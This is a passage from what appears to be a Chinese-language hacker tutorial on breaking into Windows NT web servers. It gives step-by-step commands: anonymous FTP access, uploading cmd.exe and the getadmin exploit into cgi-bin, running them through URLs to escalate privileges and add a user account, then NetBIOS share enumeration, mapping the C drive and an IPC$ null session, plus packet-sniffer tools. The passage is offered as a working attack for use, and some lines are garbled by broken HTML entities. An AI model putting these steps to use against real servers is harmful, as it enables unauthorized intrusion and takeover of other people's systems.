ftp www.xxx.com connected to www.xxx.com |
user (www.xxx.comnone)):anonymous password: 輸入 guest@ 或者guest |
在這種情況下我們就可以進nt server的ftp了。
進去以后,看看目錄列表,試試 cd /c 或wwwroot等關鍵目錄,如果運氣好,改變目錄成功,這時你就有了80%的把握。
現(xiàn)在,開始查找cgi-bin目錄(或者scripts目錄)。進去以后,把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll傳上去到cgi-bin。
然后輸入:http://www.xxx.com/cgi-bin/getadmin.exe?iusr_saturn
大約十多秒后屏幕顯示:
cgi error |
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add |
| http://www.xxx.com/cgi-bin/getadmin.exe?china |
或者
| http://www.xxx.com/scripts/tools/getadmin.exe?china |
之三:
用nt的netbios技術掃描
| nbtstat -a http://www.xxx.com/ |
或者,
| nbtstat -a http://www.xxx.com/ |
這樣可以得到其域的共享資源名稱;
net view file:/www.xxx.com/ |
可以獲得其機器的共享資源名稱,如果有c盤,
| net use f: file:/www.xxx.com/c |
可以用f:映射其c盤,
net use $">\\111.111.111.111\ipc$content$nbsp;"quot;"quot; /user:"quot;"quot; |
windows95和98的用戶可以用這個tcp/ip工具去抓tcp/ip連接中的包:windump95.exe 使用前還要下載這個庫 packet95.exe。
windowsnt用戶的版本,windump.exe packetnt.exe


